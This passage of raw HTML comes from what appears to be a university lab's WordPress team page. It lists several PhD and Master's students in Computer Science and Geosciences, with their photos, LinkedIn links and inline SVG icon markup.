55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/istockphoto-2015429231-612x612-1.jpg\" class=\"wp-image-1850 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c140-outer\">\n            <div data-colibri-id=\"182-c140\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c140 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c141\" class=\"d-block style-854 style-local-182-c141 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c141-image\">\n                      <div 